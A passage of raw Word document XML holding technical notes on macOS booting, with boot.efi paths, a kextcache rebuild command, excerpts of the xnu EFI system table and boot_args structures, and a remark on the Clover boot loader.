    <w:p w:rsidR="00B216C3" w:rsidRDefault="00B216C3" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B216C3">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>&lt;/plist&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065494F" w:rsidRPr="00B216C3" w:rsidRDefault="0065494F" w:rsidP="00B216C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00283C75" w:rsidRDefault="00754C85" w:rsidP="00314D7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/System/Library/CoreServices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>boot.efi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00283C75" w:rsidRDefault="00283C75" w:rsidP="00314D7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo kextcache -prelinked-kernel /System/Library/Caches/com.apple.kext.cache/Startup/kernelcache -K </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27F14">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
        </w:rPr>
        <w:t>/System/Library/Kernels/kernel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
        </w:rPr>
        <w:t xml:space="preserve"> /System/Library/Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B4005" w:rsidRPr="006B4005" w:rsidRDefault="004106D2" w:rsidP="00314D7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="006B4005" w:rsidRPr="006B4005">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="20"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://lipeng.de/blog/life/tech/994/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006B4005" w:rsidRDefault="006B4005" w:rsidP="00314D7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00754C85" w:rsidRDefault="00283C75" w:rsidP="00314D7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/System/Library/Caches/com.apple.kext.caches/Startup/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00283C75" w:rsidRDefault="00283C75" w:rsidP="00314D7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/System/Library/Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRDefault="007674F2" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc445313217"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boot.efi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="005A3096" w:rsidRDefault="00F017A2" w:rsidP="005A3096">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F017A2">
        <w:t>ONCE THE BOOTROM IS FINISHED, CONTROL IS PASSED TO BOOT.EFI ON THE SELECTED PARTITION</w:t>
      </w:r>
      <w:r w:rsidR="005A3096">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40F679BE" wp14:editId="4AA93BB9">
            <wp:extent cx="4832350" cy="2844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2350" cy="2844800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A3096" w:rsidRPr="00F017A2" w:rsidRDefault="005A3096" w:rsidP="005A3096">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> booe.efi as PE format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="0058734B" w:rsidRDefault="0058734B" w:rsidP="00314D7D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0058734B">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\pexpert\pexpert\i386\boot.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>typedef struct EFI_SYSTEM_TABLE_32 {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_TABLE_HEADER              Hdr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_PTR32                     FirmwareVendor;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_UINT32                    FirmwareRevision;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  EFI_HANDLE32                  ConsoleInHandle;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_PTR32                     ConIn;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_HANDLE32                  ConsoleOutHandle;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_PTR32                     ConOut;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_HANDLE32                  StandardErrorHandle;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_PTR32                     StdErr;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_PTR32                     </w:t>
      </w:r>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>RuntimeServices</w:t>
      </w:r>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_PTR32                     </w:t>
      </w:r>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>BootServices</w:t>
      </w:r>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_UINT32                    NumberOfTableEntries;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">  EFI_PTR32                     ConfigurationTable;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>} __attribute__((aligned(8))) EFI_SYSTEM_TABLE_32;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="00314D7D"/>
    <w:p w:rsidR="007674F2" w:rsidRPr="006956E7" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/System/Library/CoreServices</w:t>
      </w:r>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>boot.efi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRDefault="006956E7" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRDefault="006956E7" w:rsidP="006956E7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Some of you may wonder why Clover can boot with kernel cache while other, legacy, boot loaders cannot. The answer is rather simple. Clover loads: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="006956E7">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/standalone/i386/boot.efi </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRPr="007674F2" w:rsidRDefault="006956E7" w:rsidP="006956E7">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>and this file adds support for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lzvn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>with yet another (also different) 2 KB opcode.table Oops.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00475314" w:rsidRPr="006B4005" w:rsidRDefault="007674F2" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc445313218"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boot_args</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="00BA026A" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="00BA026A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\pexpert\pexpert\i386\boot.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>typedef struct boot_args {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint16_t    Revision;   /* Revision of boot_args structure */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint16_t    Version;    /* Version of boot_args structure */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint8_t     efiMode;    /* 32 = 32-bit, 64 = 64-bit */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint8_t     debugMode;  /* Bit field with behavior changes */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    uint16_t    flags;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    char        CommandLine[BOOT_LINE_LENGTH];  /* Passed in command line */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    MemoryMap;  /* Physical address of memory map */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    MemoryMapSize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    MemoryMapDescriptorSize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    uint32_t    MemoryMapDescriptorVersion;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007674F2" w:rsidRPr="007674F2" w:rsidRDefault="007674F2" w:rsidP="007674F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007674F2">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    Boot_Video  Video;      /* Video Information */</w:t>
      </w:r>
    </w:p>
